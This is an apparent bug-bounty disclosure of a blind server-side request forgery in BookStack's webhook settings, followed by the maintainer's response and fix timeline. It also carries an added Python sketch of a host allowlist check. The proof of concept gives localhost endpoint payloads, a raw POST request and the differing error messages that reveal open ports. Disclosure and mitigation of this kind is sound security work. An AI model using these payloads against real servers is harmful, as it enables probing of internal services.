Server Side Request Forgery (SSRF) in bookstackapp/bookstack

Valid

Reported on Jul 27th 2023


Description

The Webhook function lets a logged-in user point a webhook endpoint at the server's local environment.
Because the resulting error message differs between open and closed ports, this blind SSRF makes it possible to perform a port scan against the local environment.

Proof of Concept

After logging in, open the webhook settings page, create a webhook whose endpoint URL follows the pattern below, and confirm from the difference in the returned message that the server reached the local environment.

Payload

Open port: http://localhost:80
Closed port: http://localhost:1234

Request

POST /settings/webhooks/create HTTP/2
Host: demo.bookstackapp.com
 ...

_token=6AoIWKtSMXumoIqe2YyXsDREcraLVqwaIjf8VEV0&active=true&name=a&endpoint=http%3A%2F%2Flocalhost%3A1234%2F&timeout=20&events%5B%5D=all

Response Result (Error Message)

Open port:
Response status from endpoint was 405

Closed port:
cURL error 7: Failed to connect to localhost port 1234 after 0 ms: Connection refused (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for http://localhost:1234/

PoC Video

https://drive.google.com/file/d/1SM3HwCulnW_09L8FYo6V4wWc4tx95rYC/view?usp=drive_link

Impact

The host's local environment can be port-scanned through the webhook endpoint.
Sensitive information exposed by services in that local environment may also be obtained.

bookstackapp/bookstack maintainer modified the Severity from Medium (5.3) to Low (2.4) 7 months ago
bookstackapp/bookstack maintainer, 7 months ago:

Thanks @scgajge12 for reporting. I updated the severity since this requires admin user access and user interaction to exploit.

I wouldn't want to reduce error messages or prevent local access in general, since the errors are meant to be actual and detailed, and there are legitimate local use-cases.

I'll probably instead add some level of SSR_HOST_ALLOWLIST option so a system admin can limit where all BookStack server-side-requests can be sent to.

This is pretty low-risk/low severity in my view so not something I'd rush a bug-fix for, but will more likely be something I target for the next feature releases (1-2 month release cycle).
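An added example, not BookStack's own code, of the host-allowlist control the maintainer describes above: an outbound webhook URL is checked against an admin-configured allowlist before any request is made, so an endpoint such as the PoC's http://localhost:1234/ is refused before the connection error that leaks port state is ever produced. The SSR_HOST_ALLOWLIST format (comma-separated hostnames and CIDR ranges), the allowlist contents and the resolved addresses are constructed assumptions; DNS resolution is left to the caller so the check runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed allowlist: names and ranges an admin trusts webhooks to reach.
# An empty value means the option is unset and outbound requests are unrestricted.
SSR_HOST_ALLOWLIST = "hooks.example.com,10.20.0.0/16"


def parse_allowlist(raw):
    """Split a comma-separated allowlist into hostnames and IP networks."""
    names, nets = set(), []
    for item in filter(None, (s.strip() for s in raw.split(","))):
        try:
            nets.append(ipaddress.ip_network(item, strict=False))
        except ValueError:
            names.add(item.lower())  # not a CIDR, treat as a hostname
    return names, nets


def webhook_url_allowed(url, resolved_ips, allowlist=SSR_HOST_ALLOWLIST):
    """Return (allowed, reason) for an outbound webhook URL.

    `resolved_ips` is the list of addresses the URL's host resolves to,
    supplied by the caller, so the decision covers what the request would
    actually connect to rather than only the literal host string.
    """
    if not allowlist.strip():
        return True, "no allowlist configured"
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, "unsupported scheme or missing host"
    names, nets = parse_allowlist(allowlist)
    host = parts.hostname.lower()
    if host in names:
        return True, "host on allowlist"
    if not resolved_ips:
        return False, f"{host} did not resolve"
    # Every resolved address must fall inside an allowed range; loopback,
    # link-local and private ranges are rejected unless explicitly listed.
    for ip in resolved_ips:
        addr = ipaddress.ip_address(ip)
        if not any(addr in net for net in nets):
            return False, f"{host} -> {ip} not in allowed ranges"
    return True, "all resolved addresses in allowed ranges"
```

Rejected URLs should produce the same generic validation message regardless of the target, so the allowlist check itself does not become a new oracle.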

bookstackapp/bookstack maintainer validated this vulnerability 7 months ago
scgajge12 has been awarded the disclosure bounty
bookstackapp/bookstack maintainer marked this as fixed in v23.08 with commit c324ad 6 months ago
This vulnerability has now been published 6 months ago